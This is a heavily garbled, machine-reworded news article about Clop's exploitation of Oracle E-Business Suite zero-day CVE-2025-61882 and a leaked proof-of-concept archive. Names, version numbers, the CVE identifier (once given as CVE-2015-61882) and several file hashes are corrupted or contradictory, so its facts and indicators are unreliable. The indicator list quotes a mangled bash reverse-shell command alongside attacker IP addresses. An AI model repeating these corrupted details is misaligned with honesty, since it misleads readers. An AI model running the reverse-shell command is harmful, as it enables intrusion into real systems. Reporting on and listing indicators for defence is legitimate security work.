Publishing views: 1

EBS Zero-Day used in the CLOP data theft attack by Oracle

“Ebz Zero-Day, which is exploited in the CLOP data theft attack, is now corrected by Oracle.”

Oracle alerts users to the weakness of the dangerous electronic business suite, zero day, which has been determined as CVE-2025-61882, which allows the implementation of the unbelievable remote code. CLOP data is trying to take advantage of this weakness.

Due to its ease of exploitation and the absence of authentication, the synchronized treatment product for the Oracle E-Business group (component: the integration of the publisher BI) has a weakness with the CVSS 9.8 base degree.

Oracle consultant

Oracle has released an emergency update to repair zero weakness on the zero day, which was verified to influence Oracle E-Business Suite 12.2.3-12.14. Customers who want to apply new safety updates first must install the critical correction update in October 2023, according to the company.

Oracle officials must install the safety update as soon as possible because there is a general POC exploitation, and weakness is active.

Attacks

Although Oracle did not say that this is a vulnerability on zero day, they participated in the signs of the settlement that matches this EBS Oracle EBS, which was recently published by actors threats on Telegram.

The CLOP RANSOMWare group used this security vulnerability in data theft activities in August 2025, according to Charmalz Carmeal, Cto of Mandriat, section of Google Cloud.

Charles Karmal

Exposibility (9.8 CVSS) that allows the implementation of an unhealthy remote icon is CVE-2015-61882.

When Mandriat and Google that Intelligence Group (GTIG) announced last week that she was watching a new campaign in which many companies received emails that he claimed to be a representative of the threats, news about the latest blackmail in Club for the first time.

According to these email messages, Klopp stole information from the Suite Oracle E-Business Systems at Oracle, and was asked for a ransom to maintain special information.

CL0p team

But instead of using the new zero day that we know now was working in the attacks, Oracle first connected the Cloop blackmail to the weaknesses that were repaired in July 2025.

Oracle has now unveiled the signs of settlement for zero exploitation a day, including the exploitation and relevant files archive, and ordered a remote shell, and the IP IP.

• 200 (.) 107 (.) 207 (.) 26 – IP address associated with remarkable exploitation. (HTTP Get and Post Request)
• 185 (.) 181 (.) 60 (.) 11 – IP address associated with remarkable exploitation. (HTTP Get and Post Request)
• S -C/BIN/BASH -I> &/Dev/TCP // 0> & 1 -The command was executed by Exploit to open a reverse shell.
• 76B6D36e04E367a234c445B51ECCE97E4C614E88dfb4f72B104CA0f31235d – Oracle_bs_nday_Exploit_poc_scited_lapsus_CL0p_hunters.zip
• AA0D3859D6633B62BCCFB69017D33A8979a3be1f3f0a5a4BFFFFFFPFPFFPFFFPFFPFFPFFF6960D6C73d41121-Oracle_ebs_nday_Exploit_poc_scited_lapsus_retard-CL0p_HUNTERS
• 6FD538E4A8E493dda6F9FCDC96E814BD14F3E2EF8AA46F0143BFFFFFAFAD82C1B-Oracle_bs_NDY_Exploit_poc_scited_lapsus_RTARD-Cleard.

Exploitation of lapsus $ fishermen leaked

Although the CLOP is responsible for the exploitation of Oracle Zero-Day and its data theft attacks, the Zero Akhbar was initially reported by a different group of threat representatives who recently occupied newspaper headlines of the vast data theft attacks against Slesforce customers.

These actors, who define themselves as “scattered hunters $” and say they consist of representatives of threats from SHINYHUNRS, LAPSUS $ and Scatled Spider, sent two files on Telegram on Friday that they claimed that he had nothing to do with ClOP attacks.

The Oracle source code in a file called “GIFE_FROM_CL0P.7Z” seems to be linked to “Support.racle.com” based on file names.

However, the threat representatives also released the archiving “Oracle_bs_nday_exploit_poc_scatred_lapsus_retard_cl0p_hunters.zip”, which the file name was not hinted is the exploitation of Uraacle E-Business used by the CLOP.

This file is the same as what appears in the Oracle indicators of the settlement, according to BleepingComputer.

Two Python, Exp.py and Server.py programs are included, as well as a file entitled Readme..MD in this archive. By taking advantage of the weak oacle E-Business suite, Python software can open this reverse cortex for the threat representative servers or run an arbitrary order.

It has now been established that the Clop Ransomware gang is used this exploitation because Oracle IOCS provides the name of the exploitation archive provided by the lapsus fishermen.

However, it raises concerns about how the actors get the threats of $ Lapsus hunters scattered on exploitation and whether they collaborate with CLOP or not.

To inquire about this relationship, Bleepingcompter communicate with Shinyhunters and CLOP officials, but it has not yet heard.

About the author

Suraj Cole He is a content specialist in technical writing about cybersecurity and information security. He wrote many amazing articles on cybersecurity concepts, with the latest trends in electronic awareness and ethical piracy. Learn more about “him”.

Read more:

The largest global fraud in Bitcoin: “Crypto Queen” supports a digital fraud of 60,000 rupees

About the author